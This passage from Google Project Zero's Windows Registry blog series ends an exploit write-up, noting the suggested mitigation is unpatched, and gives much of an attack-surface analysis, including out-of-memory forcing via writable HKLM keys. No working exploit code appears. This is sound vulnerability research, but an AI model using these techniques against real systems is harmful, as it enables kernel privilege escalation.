    As we can see, the attack was indeed successful, and our cmd.exe process is now running as NT AUTHORITY\SYSTEM. A similar effect could be achieved from the graphical interface by double-clicking the .reg file and applying it using the Regedit program associated with this extension. This is exactly how I finalized my attack during the exploit demonstration at OffensiveCon 2024, which can be viewed in the recording of the presentation:

    Final thoughts

    Since we have now fully achieved our intended goal, we can return to our earlier, incomplete diagram, and fill it in with all the intermediate steps we have taken:

    A flowchart illustrating a multi-step attack chain leading to privilege escalation. The process begins with “Hive memory corruption”, which leads to “Construction of a controlled registry value”. This enables “Disabling the cell index bounds check”, followed by a “Kernel image base leak”. The leak is then used for “Construction of self-referential values for arbitrary kernel r/w” (read/write), ultimately resulting in “Privilege escalation by stealing the system token”.

    To conclude this blog post, I would like to share some final thoughts regarding hive-based memory corruption vulnerabilities.

    Exploit mitigations

    The above exploit shows that out-of-bounds cell indexes in the registry are a powerful exploitation technique, whose main strength lies in its determinism. Within a specific version of the operating system, a given OOB index will always result in references to the same fields of the _CMHIVE structure, which eliminates the need to use any probabilistic exploitation methods such as kernel pool spraying. Of all the available hive memory corruption exploitation methods, I consider this one to be the most stable and practical.

    Therefore, it should come as no surprise that I would like Microsoft to mitigate this technique for the security of all Windows users. I already emphasized this in my previous blog post #7, but now the benefit of this mitigation is even more apparent: since the cell index bounds check is already present in HvpReleaseCellPaged, moving it to HvpGetCellPaged should be completely neutral in terms of system performance, and it would fully prevent the use of OOB indexes for any malicious purposes. I suggested this course of action in November 2023, but it hasn't been implemented by the vendor yet, so all the techniques described here still work at the time of publication.

    False File Immutability

    So far in this blog, we have mostly focused on a scenario where we can control the internal regf data of an active hive through memory corruption. This is certainly the most likely reason why someone would take control of registry structures, but not necessarily the only one. As I already mentioned in the previous posts, Windows uses section objects and their corresponding section views to map hive files into memory. This means that the mappings are backed by the corresponding files, and if any of them are ever evicted from memory (e.g., due to memory pressure in the system), they will be reloaded from disk the next time they are accessed. Therefore, it is crucial for system security to protect actively loaded hives from being simultaneously written to. This guarantee is achieved in the CmpOpenHiveFile function through the ShareAccess argument passed to ZwCreateFile, which takes a value of 0 or at most FILE_SHARE_READ, but never FILE_SHARE_WRITE. This causes the operating system to ensure that no application can open the file for writing as long as the handle remains open.

    As I write these words, the research titled False File Immutability, published by Gabriel Landau in 2024, naturally comes to my mind. He effectively demonstrated that for files opened from remote network shares (e.g., via the SMB protocol), guarantees regarding their immutability may not be upheld in practice, as the local computer simply lacks physical control over it. However, the registry implementation is generally prepared for this eventuality: for hives loaded from locations other than the system partition, the HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL and VIEW_MAP_MUST_BE_KEPT_LOCAL flags are used, as discussed in blog post #6. These flags instruct the kernel to keep local copies of each memory page for such hives, never allowing them to be completely evicted and, as a result, having to be read again from remote storage. Thus, the attack vector seems to be correctly addressed.

    However, during my audit of the registry's memory management implementation last year, I discovered two related vulnerabilities: CVE-2024-43452 and CVE-2024-49114. The second one is particularly noteworthy because, by abusing the Cloud Filter API functionality and its "placeholder files", it was possible to arbitrarily modify active hive files in the system, including those loaded from the C:\ drive. This completely bypassed the sharing access right checks and their associated security guarantees. With this type of issue, the hive corruption exploitation techniques can be used without any actual memory corruption taking place, by simply replacing the memory in question with controlled data. I believe that vulnerabilities of this class can be a real treat for bug hunters, and they are certainly worth remembering for the future.

    Conclusion

    Dear reader, if you've made it to the end of this blog post, and especially if you've read all the posts in this series, I'd like to sincerely congratulate you on your perseverance. 🙂 Through these write ups, I hope I've managed to document as many implementation details of the registry as possible; details that might otherwise have never seen the light of day. My goal was to show how interesting and internally complex this mechanism is, and in particular, what an important role it plays in the security of Windows as a whole. Thank you for joining me on this adventure, and see you next time!

    • ✇Project Zero
    • The Windows Registry Adventure #7: Attack surface analysis Google Project Zero
      Posted by Mateusz Jurczyk, Google Project Zero In the first three blog posts of this series, I sought to outline what the Windows Registry actually is, its role, history, and where to find further information about it. In the subsequent three posts, my goal was to describe in detail how this mechanism works internally – from the perspective of its clients (e.g., user-mode applications running on Windows), the regf format used to encode hives, and finally the kernel itself, which contains it
       

    The Windows Registry Adventure #7: Attack surface analysis

    23 de Maio de 2025, 06:05

    Posted by Mateusz Jurczyk, Google Project Zero

    In the first three blog posts of this series, I sought to outline what the Windows Registry actually is, its role, history, and where to find further information about it. In the subsequent three posts, my goal was to describe in detail how this mechanism works internally – from the perspective of its clients (e.g., user-mode applications running on Windows), the regf format used to encode hives, and finally the kernel itself, which contains its canonical implementation. I believe all these elements are essential for painting a complete picture of this subsystem, and in a way, it shows my own approach to security research. One could say that going through this tedious process of getting to know the target unnecessarily lengthens the total research time, and to some extent, they would be right. On the other hand, I believe that to conduct complete research, it is equally important to answer the question of how certain things are implemented, as well as why they are implemented that way – and the latter part often requires a deeper dive into the subject. And since I have already spent the time reverse engineering and understanding various internal aspects of the registry, there are great reasons to share the information with the wider community. There is a lack of publicly available materials on how various mechanisms in the registry work, especially the most recent and most complicated ones, so I hope that the knowledge I have documented here will prove useful to others in the future.

    In this blog post, we get to the heart of the matter, the actual security of the Windows Registry. I'd like to talk about what made a feature that was initially meant to be just a quick test of my fuzzing infrastructure draw me into manual research for the next 1.5 ~ 2 years, and result in Microsoft fixing (so far) 53 CVEs. I will describe the various areas that are important in the context of low-level security research, from very general ones, such as the characteristics of the codebase that allow security bugs to exist in the first place, to more specific ones, like all possible entry points to attack the registry, the impact of vulnerabilities and the primitives they generate, and some considerations on effective fuzzing and where more bugs might still be lurking.

    Let's start with a quick recap of the registry's most fundamental properties as an attack surface:

    • Local attack surface for privilege escalation: As we already know, the Windows Registry is a strictly local attack surface that can potentially be leveraged by a less privileged process to gain the privileges of a higher privileged process or the kernel. It doesn't have any remote components except for the Remote Registry service, which is relatively small and not accessible from the Internet on most Windows installations.
    • Complex, old codebase in a memory-unsafe language: The Windows Registry is a vast and complex mechanism, entirely written in C, most of it many years ago. This means that both logic and memory safety bugs are likely to occur, and many such issues, once found, would likely remain unfixed for years or even decades.
    • Present in the core NT kernel: The registry implementation resides in the core Windows kernel executable (ntoskrnl.exe), which means it is not subject to mitigations like the win32k lockdown. Of course, the reachability of each registry bug needs to be considered separately in the context of specific restrictions (e.g., sandbox), as some of them require file system access or the ability to open a handle to a specific key. Nevertheless, being an integral part of the kernel significantly increases the chances that a given bug can be exploited.
    • Most code reachable by unprivileged users: The registry is a feature that was created for use by ordinary user-mode applications. It is therefore not surprising that the vast majority of registry-related code is reachable without any special privileges, and only a small part of the interface requires administrator rights. Privilege escalation from medium IL (Integrity Level) to the kernel is probably the most likely scenario of how a registry vulnerability could be exploited.
    • Manages sensitive information: In addition to the registry implementation itself being complex and potentially prone to bugs, it's important to remember that the registry inherently stores security-critical system information, including various global configurations, passwords, user permissions, and other sensitive data. This means that not only low-level bugs that directly allow code execution are a concern, but also data-only attacks and logic bugs that permit unauthorized modification or even disclosure of registry keys without proper permissions.
    • Not trivial to fuzz, and not very well documented: Overall, it seems that the registry is not a very friendly target for bug hunting without any knowledge of its internals. At the same time, obtaining the information is not easy either, especially for the latest registry mechanisms, which are not publicly documented and learning about them basically boils down to reverse engineering. In other words, the entry bar into this area is quite high, which can be an advantage or a disadvantage depending on the time and commitment of a potential researcher.

    Security properties

    The above cursory analysis seems to indicate that the registry may be a good audit target for someone interested in EoP bugs on Windows.  Let's now take a closer look at some of the specific low-level reasons why the registry has proven to be a fruitful research objective.

    Broad range of bug classes

    Due to the registry being both complex and a central mechanism in the system operating with kernel-mode privileges, numerous classes of bugs can occur within it. An example vulnerability classification is presented below:

    • Hive memory corruption: Every invasive operation performed on the registry (i.e., a "write" operation) is reflected in changes made to the memory-mapped view of the hive's structure. Considering that objects within the hive include variable-length arrays, structures with counted references, and references to other cells via cell indexes (hives' equivalent of memory pointers), it's natural to expect common issues like buffer overflows or use-after-frees.
    • Pool memory corruption: In addition to hive memory mappings, the Configuration Manager also stores a significant amount of information on kernel pools. Firstly, there are cached copies of certain hive data, as described in my previous blog post. Secondly, there are various auxiliary objects, such as those allocated and subsequently released within a single system call. Many of these objects can fall victim to memory management bugs typical of the C language.
    • Information disclosure: Because the registry implementation is part of the kernel, and it exchanges large amounts of information with unprivileged user-mode applications, it must be careful not to accidentally disclose uninitialized data from the stack or kernel pools to the caller. This can happen both through output data copied to user-mode memory and through other channels, such as data leakage to a file (hive file or related log file). Therefore, it is worthwhile to keep an eye on whether all arrays and dynamically allocated buffers are fully populated or carefully filled with zeros before passing them to a lower-privileged context.
    • Race conditions: As a multithreaded environment, Windows allows for concurrent registry access by multiple threads. Consequently, the registry implementation must correctly synchronize access to all shared kernel-side objects and be mindful of "double fetch" bugs, which are characteristic of user-mode client interactions.
    • Logic bugs: In addition to being memory-safe and free of low-level bugs, a secure registry implementation must also enforce correct high-level security logic. This means preventing unauthorized users from accessing restricted keys and ensuring that the registry operates consistently with its documentation under all circumstances. This requires a deep understanding of both the explicit documentation and the implicit assumptions that underpin the registry's security from the kernel developers. Ultimately, any behavior that deviates from expected logic, whether documented or assumed, could lead to vulnerabilities.
    • Inter-process attacks: The registry can serve as a security target, but also as a means to exploit flaws in other applications on the system. It is a shared database, and a local attacker has many ways to indirectly interact with more privileged programs and services. A simple example is when privileged code sets overly permissive permissions on its keys, allowing unauthorized reading or modification. More complex cases can occur when there is a race condition between key creation and setting its restricted security descriptor, or when a key modification involving several properties is not performed transactionally, potentially leading to an inconsistent state. The specifics depend on how the privileged process uses the registry interface.

    If I were to depict the Windows Registry in a single Venn diagram, highlighting its various possible bug classes, it might look something like this:

    A Venn diagram illustrates the intersection of different bug categories within the Windows Registry. Four overlapping circles represent Kernel-specific bugs, File parsing bugs, Object lifetime bugs, and Logic bugs. The central area where all circles overlap is highlighted, indicating vulnerabilities that combine all these bug types.

    Manual reference counting

    As I have mentioned multiple times, security descriptors in registry hives are shared by multiple keys, and therefore, must be reference counted. The field responsible for this is a 32-bit unsigned integer, and any situation where it's set to a value lower than the actual number of references can result in the release of that security descriptor while it's still in use, leading to a use-after-free condition and hive-based memory corruption. So, we see that it's absolutely critical that this refcounting is implemented correctly, but unfortunately, there are (or were until recently) many reasons why this mechanism could be prone to bugs:

    • Usually, a reference count is a construct that exists strictly in memory, where it is initialized with a value of 1, then incremented and decremented some number of times, and finally drops to zero, causing the object to be freed. However, with registry hives, the initial refcount values are loaded from disk, from a file that we assume is controlled by the attacker. Therefore, these values cannot be trusted in any way, and the first necessary step is to actually compare and potentially adjust them according to the true number of references to each descriptor. Even though this is done in theory, bugs can creep into this logic in practice (CVE-2022-34707, CVE-2023-38139).
    • For a long time, all operations on reference counts were performed by directly referencing the _CM_KEY_SECURITY.ReferenceCount field, instead of using a secure wrapper. As a result, none of these incrementations were protected against integer overflow. This meant that not only a too small, but also a too large refcount value could eventually overflow and lead to a use-after-free situation (CVE-2023-28248, CVE-2024-43641). This weakness was gradually addressed in various places in the registry code between April 2023 and November 2024. Currently, all instances of refcount incrementation appear to be secure and involve calling the special helper function CmpKeySecurityIncrementReferenceCount, which protects against integer overflow. Its counterpart for refcount decrementation is CmpKeySecurityDecrementReferenceCount.
    • It seems that there is a lack of clarity and understanding of how certain special types of keys, such as predefined keys and tombstone keys, behave in relation to security descriptors. In theory, the only type of key that does not have a security descriptor assigned to it is the exit node (i.e., a key with the KEY_HIVE_EXIT flag set, found solely in the virtual hive rooted at \Registry\), while all other keys do have a security descriptor assigned to them, even if it is not used for anything. In practice, however, there have been several vulnerabilities in Windows that resulted either from incorrect security refresh in KCB for special types of keys (CVE-2023-21774), from releasing the security descriptor of a predefined key without considering its reference count (CVE-2023-35356), or from completely forgetting the need for reference counting the descriptors of tombstone keys in the "rename" operation (CVE-2023-35382).
    • When the reference count of a security descriptor reaches zero and is released, this operation is irreversible. There is no guarantee that upon reallocation, the descriptor would have the same cell index, or even that it could be reallocated at all. This is crucial for multi-step operations where individual actions could fail, necessitating a full rollback to the original state. Ideally, releasing security descriptors should always be the final step, only when the kernel can be certain that the entire operation will succeed. A vulnerability exemplifying this is CVE-2023-21772, where the registry virtualization code first released the old security descriptor and then attempted to allocate a new one. If the allocation failed, the key was left without any security properties, violating a fundamental assumption of the registry and potentially having severe consequences for system memory safety.

    Aggressive self-healing and recovery

    As I described in blog post #5, one of the registry's most interesting features, which distinguishes it from many other file format implementations, is that it is self-healing. The entire hive loading process, from the internal CmCheckRegistry function downwards, is focused on loading the database at all costs, even if some corrupted fragments are encountered. Only if the file damage is so extensive that recovering any data is impossible does the entire loading process fail. Of course, given that the registry stores critical system data such as its basic configuration, and the lack of access to this data virtually prevents Windows from booting, this decision made a lot of sense from the system reliability point of view. It's probably safe to assume that it has prevented the need for system reinstallation on numerous computers, simply because it did not reject hives with minor damage that might have appeared due to random hardware failure.

    However, from a security perspective, this behavior is not necessarily advantageous. Firstly, it seems obvious that upon encountering an error in the input data, it is simpler to unconditionally halt its processing rather than attempt to repair it. In the latter case, it is possible for the programmer to overlook an edge case – forget to reset some field in some structure, etc. – and thus instead of fixing the file, allow for another unforeseen, inconsistent state to materialize within it. In other words, the repair logic constitutes an additional attack surface, and one that is potentially even more interesting and error-prone than other parts of the implementation. A classic example of a vulnerability associated with this property is CVE-2023-38139.

    Secondly, in my view, the existence of this logic may have negatively impacted the secure development of the registry code, perhaps by leading to a discrepancy between what it guaranteed and what other developers thought it had guaranteed. For example, in 1991–1993, when the foundations of the Configuration Manager subsystem were being created in their current form, probably no one considered hive loading a potential attack vector. At that time, the registry was used only to store system configuration, and controlled hive loading was privileged and required admin rights. Therefore, I suspect that the main goal of hive checking at that time was to detect simple data inconsistencies due to hardware problems, such as single bit flips. No one expected a hive to contain a complex, specially crafted multi-kilobyte data structure designed to trigger a security flaw. Perhaps the rest of the registry code was written under the assumption that since data sanitization and self-healing occurred at load time, its state was safe from that point on and no further error handling was needed (except for out-of-memory errors). Then, in Windows Vista, a decision was made to open access to controlled hive loading by unprivileged users through the app hive mechanism, and it suddenly turned out that the existing safeguards were not entirely adequate. Attackers now became able to devise data constructs that were structurally correct at the low level, but completely beyond the scope of what the actual implementation expected and could handle.

    Finally, self-healing can adversely affect system security by concealing potential registry bugs that could trigger during normal Windows operation. These problems might only become apparent after a period of time and with a "build-up" of enough issues within the hive. Because hives are mapped into memory, and the kernel operates directly on the data within the file, there exists a category of errors known as "inconsistent hive state". This refers to a data structure within the hive that doesn't fully conform to the file format specification. The occurrence of such an inconsistency is noteworthy in itself and, for someone knowledgeable about the registry, it could be a direct clue for finding vulnerabilities. However, such instances rarely cause an immediate system crash or other visible side effects. Consider security descriptors and their reference counting: as mentioned earlier, any situation where the active number of references exceeds the reference count indicates a serious security flaw. However, even if this were to happen during normal system operation, it would require all other references to that descriptor to be released and then for some other data to overwrite the freed descriptor. Then, a dangling reference would need to be used to access the descriptor. The occurrence of all these factors in sequence is quite unlikely, and the presence of self-healing further decreases these chances, as the reference count would be restored to its correct value at the next hive load. This characteristic can be likened to wrapping the entire registry code in a try/except block that catches all exceptions and masks them from the user. This is certainly helpful in the context of system reliability, but for security, it means that potential bugs are harder to spot during system run time and, for the same reason, quite difficult to fuzz. This does not mean that they don't exist; their detection just becomes more challenging.

    Unclear boundaries between hard and conventional format requirements

    This point is related to the previous section. In the regf format, there are certain requirements that are fairly obvious and must be always met for a file to be considered valid. Likewise, there are many elements that are permitted to be formatted arbitrarily, at the discretion of the format user. However, there is a third category, a gray area of requirements that seem reasonable and probably would be good if they were met, but it is not entirely clear whether they are formally required. Another way to describe this set of states is one that is not generated by the Windows kernel itself but is still not obviously incorrect. From a researcher's perspective, it would be worthwhile to know which parts of the format are actually required by the specification and which are only a convention adopted by the Windows code.

    We might never find out, as Microsoft hasn't published an official format specification and it seems unlikely that they will in the future. The only option left for us is to rely on the implementation of the CmpCheck* functions (CmpCheckKey, CmpCheckValueList, etc.) as a sort of oracle and assume that everything there is enforced as a hard requirement, while all other states are permissible. If we go down this path, we might be in for a big surprise, as it turns out that there are many logical-sounding requirements that are not enforced in practice. This could allow user-controlled hives to contain constructs that are not obviously problematic, but are inconsistent with the spirit of the registry and its rules. In many cases, they allow encoding data in a less-than-optimal way, leading to unexpected redundancy. Some examples of such constructs are presented below:

    • Values with duplicate names within a single key: Under normal conditions, only one value with a given name can exist in a key, and if there is a subsequent write to the same name, the new data is assigned to the existing value. However, the uniqueness of value names is not required in input hives, and it is possible to load a hive with duplicate values.
    • Duplicate identical security descriptors within a single hive: Similar to the previous point, it is assumed that security descriptors within a hive are unique, and if an existing descriptor is assigned to another key, its reference count is incremented rather than allocating a new object. However, there is no guarantee that a specially crafted hive will not contain multiple duplicates of the same security descriptor, and this is accepted by the loader.
    • Uncompressed key names consisting solely of ASCII characters: Under normal circumstances, if a given key has a name comprising only ASCII characters, it will always be stored in a compressed form, i.e., by writing two bytes of the name in each element of the _CM_KEY_NODE.Name array of type uint16, and setting the KEY_COMP_NAME flag (0x20) in _CM_KEY_NODE.Flags. However, once again, optimal representation of names is not required when loading the hive, and this convention can be ignored without issue.
    • Allocated but unused cells: The Windows registry implementation deallocates objects within a hive when they are no longer needed, making space for new data. However, the loader does not require every cell marked "allocated" to be actively used. Similarly, security descriptors with a reference count of zero are typically deallocated. However, until a November 2024 refactor of the CmpCheckAndFixSecurityCellsRefcount function, it was possible to load a hive with unused security descriptors still present in the linked list. This behavior has since been changed, and unused security descriptors encountered during loading are now automatically freed and removed from the list.

    These examples illustrate the issue well, but none of them (as far as I know) have particularly significant security implications. However, there were also a few specific memory corruption vulnerabilities that stemmed from the fact that the registry code made theoretically sound assumptions about the hive structure, but they were not unenforced by the loader:

    • CVE-2022-37988: This bug is closely related to the fact that cells larger than 16 KiB are aligned to the nearest power of two in Windows, but this condition doesn't need to be satisfied during loading. This caused the shrinking of a cell to fail, even though it should always succeed in-place, "surprising" the client of the allocator and resulting in a use-after-free condition.
    • CVE-2022-37956: As I described in blog post #5, Windows has some logic to ensure that no leaf-type subkey list (li, lf, or lh) exceeds 511 or 1012 elements, depending on its specific type. If a list is expanded beyond this limit, it is automatically split into two lists, each half the original length. Another reasonable assumption is that the root index length would never approach the maximum value of _CM_KEY_INDEX.Count (uint16) under normal circumstances. This would require an unrealistically large number of subkeys or a very specific sequence of millions of key creations and deletions with specific names. However, it was possible to load a hive containing a subkey list of any of the four types with a length equal to 0xFFFF, and trigger a 16-bit integer overflow on the length field, leading to memory corruption. Interestingly, this is one of the few bugs that could be triggered solely with a single .bat file containing a long sequence of the reg.exe command executions.
    • CVE-2022-38037: In this case, the kernel code assumed that the hive version defined in the header (_HBASE_BLOCK.Minor) always corresponded to the type of subkey lists used in a given hive. For example, if the file version is regf 1.3, it should be impossible for it to contain lists in a format introduced in version 1.5. However, for some reason, the hive loader doesn't enforce the proper relationship between the format version and the structures used in it, which in this case led to a serious hive-based memory corruption vulnerability.

    As we can see, it is crucial to differentiate between format elements that are conventions adopted by a specific implementation, and those actually enforced during the processing of the input file. If we encounter some code that makes assumptions from the former group that don't belong to the latter one, this could indicate a serious security issue.

    Susceptibility to mishandling OOM conditions

    Generally speaking, the implementation of any function in the Windows kernel is built roughly according to the following scheme:

    NTSTATUS NtHighLevelOperation(...) {

      NTSTATUS Status;

      Status = HelperFunction1(...);

      if (!NT_SUCCESS(Status)) {

        //

        // Clean up...

        //

        return Status;

      }

      Status = HelperFunction2(...);

      if (!NT_SUCCESS(Status)) {

        //

        // Clean up...

        //

        return Status;

      }

     

      //

      // More calls...

      //

      return STATUS_SUCCESS;

    }


    Of course, this is a significant simplification, as real-world code contains keywords and constructs such as if statements, switch statements, various loops, and so on. The key point is that a considerable portion of higher-level functions call internal, lower-level functions specialized for specific tasks. Handling potential errors signalled by these functions is an important aspect of kernel code (or any code, for that matter). In low-level Windows code, error propagation occurs using the NTSTATUS type, which is essentially a signed 32-bit integer. A value of 0 signifies success (STATUS_SUCCESS), positive values indicate success but with additional information, and negative values denote errors. The sign of the number is checked by the NT_SUCCESS macro. During my research, I dedicated significant time to analyzing the error handling logic. Let's take a moment to think about the types of errors that could occur during registry operations, and the conditions that might cause them.

    A common trait of all actions that modify data in the registry is that they allocate memory. The simplest example is the allocation of auxiliary buffers from kernel pools, requested through functions from the ExAllocatePool group. If there is very little available memory at a given point in time, one of the allocation requests may return the STATUS_INSUFFICIENT_RESOURCES error code, which will be propagated back to the original caller. And since we assume that we take on the role of a local attacker who has the ability to execute code on the machine, artificially occupying all available memory is potentially possible in many ways. So this is one way to trigger errors while performing operations on the registry, but admittedly not an ideal way, as it largely depends on the amount of RAM and the maximum pagefile size. Additionally, in a situation where the kernel has so little memory that single allocations start to fail, there is a high probability of the system crashing elsewhere before the vulnerability is successfully exploited. And finally, if several allocations are requested in nearby code in a short period of time, it seems practically impossible to take precise control over which of them will succeed and which will not.

    Nonetheless, the overall concept of out-of-memory conditions is a very promising avenue for attack, especially considering that the registry primarily operates on memory-mapped hives using its own allocator, in addition to objects from kernel pools. The situation is even more favorable for an attacker due to the 2 GiB size limitation of each of the two storage types (stable and volatile) within a hive. While this is a relatively large value, it is achievable to occupy it in under a minute on today's machines. The situation is even easier if the volatile space that needs to be occupied, as it resides solely in memory and is not flushed to disk – so filling two gigabytes of memory is then a matter of seconds. It can be accomplished, for example, by creating many long registry values, which is a straightforward task when dealing with a controlled hive. However, even in system hives, this is often feasible. To perform data spraying on a given hive, we only need a single key granting us write permissions. For instance, both HKLM\Software and HKLM\System contain numerous keys that allow write access to any user in the system, effectively permitting them to fill it to capacity. Additionally, the "global registry quota" mechanism, implemented by the internal CmpClaimGlobalQuota and CmpReleaseGlobalQuota functions, ensures that the total memory occupied by registry data in the system does not exceed 4 GiB. Besides filling the entire space of a specific hive, this is thus another way to trigger out-of-memory conditions in the registry, especially when targeting a hive without write permissions. A concrete example where this mechanism could have been employed to corrupt the HKLM\SAM system hive is the CVE-2024-26181 vulnerability.

    Considering all this, it is a fair assumption that a local attacker can cause any call to ExAllocatePool*, HvAllocateCell, and HvReallocateCell (with a length greater than the existing cell) to fail. This opens up a large number of potential error paths to analyze. The HvAllocateCell calls are a particularly interesting starting point for analysis, as there are quite a few of them and almost all of them belong to the attack surface accessible to a regular user:

    A screenshot shows a debugger window titled xrefs to HvAllocateCell. The window lists numerous functions and their memory addresses under columns Direction, Type, Address, and Text. Nearly all entries show different system functions making a call to HvAllocateCell.

    There are two primary reasons why focusing on the analysis of error paths can be a good way to find security bugs. First, it stands to reason that on regular computers used by users, it is extremely rare for a given hive to grow to 2 GiB and run out of space, or for all registry data to simultaneously occupy 4 GiB of memory. This means that these code paths are practically never executed under normal conditions, and even if there were bugs in them, there is a very small chance that they would ever be noticed by anyone. Such rarely executed code paths are always a real treat for security researchers.

    The second reason is that proper error handling in code is inherently difficult. Many operations involve numerous steps that modify the hive's internal state. If an issue arises during these operations, the registry code must revert all changes and restore the registry to its original state (at least from the macro-architectural perspective). This requires the developer to be fully aware of all changes applied so far when implementing each error path. Additionally, proper error handling must be considered during the initial design of the control flow as well, because some registry actions are irreversible (e.g., freeing cells). The code must thus be structured so that all such operations are placed at the very end of the logic, where errors cannot occur anymore and successful execution is guaranteed.

    One example of such a vulnerability is CVE-2023-23421, which boiled down to the following code:

    NTSTATUS CmpCommitRenameKeyUoW(_CM_KCB_UOW *uow) {

      // ...

      if (!CmpAddSubKeyEx(Hive, ParentKey, NewNameKey) ||

          !CmpRemoveSubKey(Hive, ParentKey, OldNameKey)) {

        CmpFreeKeyByCell(Hive, NewNameKey);

        return STATUS_INSUFFICIENT_RESOURCES;

      }

      // ...

    }


    The issue here was that if the CmpRemoveSubKey call failed, the corresponding error path should have reversed the effect of the CmpAddSubKeyEx function in the previous line, but in practice it didn't. As a result, it was possible to end up with a dangling reference to a freed key in the subkey list, which was a typical use-after-free condition.

    A second interesting example of this type of bug was CVE-2023-21747, where an out-of-memory error could occur during a highly sensitive operation, hive unloading. As there was no way to revert the state at the time of the OOM, the vulnerability was fixed by Microsoft by refactoring the CmpRemoveSubKeyFromList function and other related functions so that they no longer allocate memory from kernel pools and thus there is no longer a physical possibility of them failing.

    Finally, I'll mention CVE-2023-38154, where the problem wasn't incorrect error handling, but a complete lack of it – the return value of the HvpPerformLogFileRecovery function was ignored, even though there was a real possibility it could end with an error. This is a fairly classic type of bug that can occur in any programming language, but it's definitely worth keeping in mind when auditing the Windows kernel.

    Susceptibility to mishandling partial successes

    The previous section discusses bugs in error handling where each function is responsible for reversing the state it has modified. However, some functions don't adhere to this operational model. Instead of operating on an "all-or-nothing" basis, they work on a best-effort basis, aiming to accomplish as much of a given task as possible. If an error occurs, they leave any changes made in place, e.g., because this result is still preferable to not making any changes. This introduces a third possible output state for such functions: complete success, partial success, and complete failure.

    This might be problematic, as the approach is incompatible with the typical usage of the NTSTATUS type, which is best suited for conveying one of two (not three) states. In theory, it is a 32-bit integer type, so it could store the additional information of the status being a partial success, and not being unambiguously positive or negative. In practice, however, the convention is to directly propagate the last error encountered within the inner function, and the outer functions very rarely "dig into" specific error codes, instead assuming that if NT_SUCCESS returns FALSE, the entire operation has failed. Such confusion at the cross-function level may have security implications if the outer function should take some additional steps in the event of a partial success of the inner function, but due to the binary interpretation of the returned error code, it ultimately does not execute them.

    A classic example of such a bug is CVE-2024-26182, which occurred at the intersection of the CmpAddSubKeyEx (outer) and CmpAddSubKeyToList (inner) functions. The problem here was that CmpAddSubKeyToList implements complex, potentially multi-step logic for expanding the subkey list, which could perform a cell reallocation and subsequently encounter an OOM error. On the other hand, the CmpAddSubKeyEx function assumed that the cell index in the subkey list should only be updated in the hive structures if CmpAddSubKeyToList fully succeeds. As a result, the partial success of CmpAddSubKeyToList could lead to a classic use-after-free situation. An attentive reader will probably notice that the return value type of the CmpAddSubKeyToList routine was BOOL and not NTSTATUS, but the bug pattern is identical.

    Overall complexity introduced over time

    One of the biggest problems with the modern implementation of the registry is that over the decades of developing this functionality, many changes and new features have been introduced. This has caused the level of complexity of its internal state to increase so much that it seems difficult to grasp for one person, unless they are a full-time registry expert that has worked on it full-time over a period of months or years. I personally believe that the registry existed in its most elegant form somewhere around Windows NT 3.1 – 3.51 (i.e. in the years 1993–1996). At the time, the mechanism was intuitive and logical for both developers and its users. Each object (key, value) either existed or not, each operation ended in either success or failure, and when it was requested on a particular key, you could be sure that it was actually performed on that key. Everything was simple, and black and white. However, over time, more and more shades of gray were being continuously added, departing from the basic assumptions:

    • The existence of predefined keys meant that every operation could no longer be performed on every key, as this special type of key was unsafe for many internal registry functions to use due to its altered semantics.
    • Due to symbolic links, opening a specific key doesn't guarantee that it will be the intended one, as it might be a different key that the original one points to.
    • Registry virtualization has introduced further uncertainty into key operations. When an operation is performed on a key, it is unclear whether the operation is actually executed on that specific key or redirected to a different one. Similarly, with read operations, a client cannot be entirely certain that it is reading from the intended key, as the data may be sourced from a different, virtualized location.
    • Transactions in the registry mean that a given state is no longer considered solely within the global view of the registry. At any given moment, there may also be changes that are visible only within a certain transaction (when they are initiated but not yet committed), and this complex scenario must be correctly handled by the kernel.
    • Layered keys have transformed the nature of hives, making them interdependent rather than self-contained database units. This is due to the introduction of differencing hives, which function solely as "patch diffs" and cannot exist independently without a base hive. Additionally, the semantics of certain objects and their fields have been altered. Previously, a key's existence was directly tied to the presence of a corresponding key node within the hive. Layered keys have disrupted this dependency. Now, a key with a key node can be non-existent if marked as a Tombstone, and a key without a corresponding key node can logically exist if its semantics are Merge-Unbacked, referencing a lower-level key with the same name.

    Of course, all of these mechanisms were designed and implemented for a specific purpose: either to make life easier for developers/applications using the Registry API, or to introduce some new functionality that is needed today. The problem is not that they were added, but that it seems that the initial design of the registry was simply not compatible with them, so they were sort of forced into the registry, and where they didn't fit, an extra layer of tape was added to hold it all together. This ultimately led to a massive expansion of the internal state that needs to be maintained within the registry. This is evident both in the significant increase in the size of old structures (like KCB) and in the number of new objects that have been added over the years. But the most unfortunate aspect is that each of these more advanced mechanisms seems to have been designed to solve one specific problem, assuming that they would operate in isolation. And indeed, they probably do under typical conditions, but a particularly malicious user could start combining these different mechanisms and making them interact. Given the difficulty in logically determining the expected behavior of some of these combinations, it is doubtful that every such case was considered, documented, implemented, and tested by Microsoft.

    The relationships between the various advanced mechanisms in the registry are humorously depicted in the image below:

    An image from a Pirates of the Caribbean movie shows a standoff with characters pointing pistols at each other. Text labels overlay the scene, metaphorically linking pirate actions to Windows Registry concepts. These concepts include Predefined Keys, Layered Keys, Transactions, Symbolic Links, and Registry Virtualization.

    Some examples of bugs caused by incorrect interactions between these mechanisms include CVE-2023-21675, CVE-2023-21748, CVE-2023-35356, CVE-2023-35357 and CVE-2023-35358.

    Entry points

    This section describes the entry points that a local attacker can use to interact with the registry and exploit any potential vulnerabilities.

    Hive loading

    Let's start with the operation of loading user-controlled hives. Since hive loading is only possible from disk (and not, for example, from a memory buffer), this means that to actually trigger this attack surface, the process must be able to create a file with controlled content, or at least a controlled prefix of several kilobytes in length. Regular programs operating at Medium IL generally have this capability, but write access to disk may be restricted for heavily sandboxed processes (e.g. renderer processes in browsers).

    When it comes to the typical type of bugs that can be triggered in this way, what primarily comes to mind are issues related to binary data parsing, and memory safety violations such as out-of-bounds buffer accesses. It is possible to encounter more logical-type issues, but they usually rely on certain assumptions about the format not being sufficiently verified, causing subsequent operations on such a hive to run into problems. It is very rare to find a vulnerability that can be both triggered and exploited by just loading the hive, without performing any follow-up actions on it. But as CVE-2024-43452 demonstrates, it can still happen sometimes.

    App hives

